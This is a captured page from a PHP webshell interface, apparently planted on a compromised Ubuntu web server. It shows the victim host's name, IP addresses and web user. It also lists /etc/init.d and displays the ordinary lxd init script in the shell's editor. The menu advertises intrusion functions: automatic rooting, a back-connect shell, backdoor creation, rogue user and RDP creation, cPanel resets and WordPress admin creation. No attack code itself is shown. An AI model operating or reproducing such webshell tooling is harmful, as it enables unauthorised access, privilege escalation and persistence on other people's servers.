Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 52.15.221.212
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
acpid
2.22
KB
-rwxr-xr-x
apache-htcacheclean
2.43
KB
-rwxr-xr-x
apache2
7.99
KB
-rwxr-xr-x
apparmor
4.23
KB
-rwxr-xr-x
apport
2.85
KB
-rwxr-xr-x
atd
1.05
KB
-rwxr-xr-x
console-setup.sh
1.2
KB
-rwxr-xr-x
cron
2.98
KB
-rwxr-xr-x
cryptdisks
937
B
-rwxr-xr-x
cryptdisks-early
978
B
-rwxr-xr-x
dbus
2.75
KB
-rwxr-xr-x
ebtables
4.38
KB
-rwxr-xr-x
grub-common
985
B
-rwxr-xr-x
hwclock.sh
3.72
KB
-rwxr-xr-x
irqbalance
2.39
KB
-rwxr-xr-x
iscsid
1.47
KB
-rwxr-xr-x
keyboard-setup.sh
1.44
KB
-rwxr-xr-x
kmod
2
KB
-rwxr-xr-x
lvm2
695
B
-rwxr-xr-x
lvm2-lvmetad
571
B
-rwxr-xr-x
lvm2-lvmpolld
586
B
-rwxr-xr-x
lxcfs
2.32
KB
-rwxr-xr-x
lxd
2.19
KB
-rwxr-xr-x
mdadm
2.59
KB
-rwxr-xr-x
mdadm-waitidle
1.22
KB
-rwxr-xr-x
mysql
5.48
KB
-rwxr-xr-x
open-iscsi
2.44
KB
-rwxr-xr-x
open-vm-tools
1.8
KB
-rwxr-xr-x
plymouth
1.33
KB
-rwxr-xr-x
plymouth-log
752
B
-rwxr-xr-x
procps
1.16
KB
-rwxr-xr-x
rsync
4.25
KB
-rwxr-xr-x
rsyslog
2.8
KB
-rwxr-xr-x
screen-cleanup
1.19
KB
-rwxr-xr-x
ssh
3.75
KB
-rwxr-xr-x
udev
5.83
KB
-rwxr-xr-x
ufw
2.03
KB
-rwxr-xr-x
unattended-upgrades
1.36
KB
-rwxr-xr-x
uuidd
1.28
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lxd
#! /bin/sh ### BEGIN INIT INFO # Short-Description: Container hypervisor based on LXC # Description: Container hypervisor based on LXC # Provides: lxd # Required-Start: $remote_fs # Required-Stop: $remote_fs # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 ### END INIT INFO DAEMON=/usr/bin/lxd NAME=lxd DESC="Container hypervisor based on LXC" PIDFILE=/var/run/lxd.pid . /lib/lsb/init-functions test -f ${DAEMON} || exit 0 set -e START="-m --start --quiet --pidfile ${PIDFILE} --name ${NAME} --startas $DAEMON --background" case "$1" in start) if init_is_upstart; then exit 1 fi /usr/lib/x86_64-linux-gnu/lxc/lxc-apparmor-load echo -n "Starting $DESC: " ulimit -n 65536 [ -e /etc/environment ] && . /etc/environment if start-stop-daemon ${START} -- --group lxd --logfile=/var/log/lxd/lxd.log >/dev/null 2>&1 ; then echo "${NAME}." ${DAEMON} waitready --timeout=600 else if start-stop-daemon --test ${START} >/dev/null 2>&1; then echo "(failed)." exit 1 else echo "${DAEMON} already running." exit 0 fi fi exit 0 ;; stop) if init_is_upstart; then exit 0 fi echo -n "Stopping $DESC: " if start-stop-daemon --stop --quiet --pidfile ${PIDFILE} \ --startas ${DAEMON} --retry 10 --name ${NAME} \ >/dev/null 2>&1 ; then echo "${NAME}." else if start-stop-daemon --test ${START} >/dev/null 2>&1; then echo "(not running)." exit 0 else echo "(failed)." exit 1 fi fi exit 0 ;; status) if init_is_upstart; then exit 0 fi status_of_proc -p ${PIDFILE} "${DAEMON}" lxd ;; restart|force-reload) if init_is_upstart; then exit 1 fi $0 stop exec $0 start ;; *) echo "Usage: $0 {start|stop|restart|force-reload}" 1>&2 exit 1 ;; esac
Close